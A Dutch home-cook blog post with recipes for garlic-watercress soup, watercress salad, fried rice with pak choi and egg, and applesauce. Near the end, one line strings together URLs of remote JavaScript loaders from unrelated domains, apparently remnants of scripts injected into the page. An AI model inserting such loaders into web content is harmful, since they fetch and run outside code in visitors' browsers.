• Cécile Graven

Samenhangende gerechten

Updated: Dec 22, 2020

Samenhangende gerechten Soep, salade, hoofdmaaltijd en dessert.

Voor botersla heeft niemand me ooit warm kunnen krijgen. Ook niet in salade.

Als kind vond ik het enige eetbare er aan het eitje en de tomaat er door. IJsbergsla vind ik wel lekker, omdat het knapperig is en rode krulsla vind ik ook wel te pruimen. Maar de voorjaars- salades met veldsla of waterkers zijn geniet-momentjes.

Van de waterkers houd ik de dikke wat peperige stelen apart. Die gaan in de soep.


KNOFLOOKSOEP

Op basis van 2 kippenbouillonblokjes en een liter water maakte ik een knoflooksoep door de buitenste bladeren van een bosje stengelknoflook samen met de in stukjes gesneden waterkers steeltjes 2 uur te laten trekken op zacht vuur. Met de schuimspaan de stukjes er uit gevist, geproefd, knoflookpoeder toegevoegd en wat fijn geknipte paksoi-bladeren en 2 in stukjes gesneden kruimige aardappels erbij, aan de kook brengen en zachtjes zo’n half uurtje doorgekookt. De aardappels maakten er een gebonden soep van. Tenslotte een paar druppels zelfgemaakte kruiden olie en wat kurkumapoeder en klaar. Nee, vitamientjes zitten er niet meer in, maar wel veel mineralen en sporen elementen.


knoflooksoep


WATERKERS-SALADE De foto die ik er van maakte kan ik nergens meer vinden, maar het zag er wel lekker uit 😉 .

Waterkers inclusief de dunne steeltjes fijn snijden, halve snoeptomaatjes er bij, bedruppelen met goede olijfolie en met kikoman sojasaus ( of met conimex ketjap asin, maar dat is minder gezond ).

Maar met citroensap kan het natuurlijk ook.


HOOFDMAALTIJD

Al eerder schreef ik dat ik wist dat rijst behoort tot de ongezonde koolhydraten, maar dat als je rijst kookt, helemaal laat afkoelen en dan weer heet maakt ( bv in soep kolen of bakken als nasi goreng) dezelfde rijst een heel gezond koolhydraat is omdat het dan in de darmen functioneert als een bundels vezels. Als ik 2 espressokopjes rijst kook is dat voor mij voldoende voor 3 a 4 warme maaltijden. En daar probeer ik iedere keer wat anders van te maken.

Dit keer werd het  gebakken rijst met meegebakken paksoi en eieren. Ik sloeg 2 eieren los met hoisinsaus. Toen de rijst en fijngesneden paksoi goed warm waren goot ik het ei-saus-mengsel er over heen en bleef omscheppen tot al het ei gestold was ( en er dus geen eiglans meer te zien was). Snel te maken en makkelijk te eten omdat alle rijstkorrels wel aan andere rijstkorrels geplakt zitten. Met goed omscheppen heb je hapklare brokjes. De foto zal nooit hoge ogen gooien in een kookrubriek, maar lekker was het wel.

Van het dessert onder deze foto heb ik geen foto gemaakt.

Als DESSERT at ik bij elk van de gerechten zelfgemaakte appelmoes ( zonder suiker, maar wel met na het koken toegevoegd citroensap ) met bendes blauwe bessen voor de vitamientjes

//peterfire.net/22a3c76046f79dd0be.jshttps://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8867xhttps://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8867x&format=arrjs&r=1587994173557

#knoflook #ei #dessert #soep #paksoi #waterkers #salade #hoofdmaaltijd

0 views0 comments

Recent Posts

See All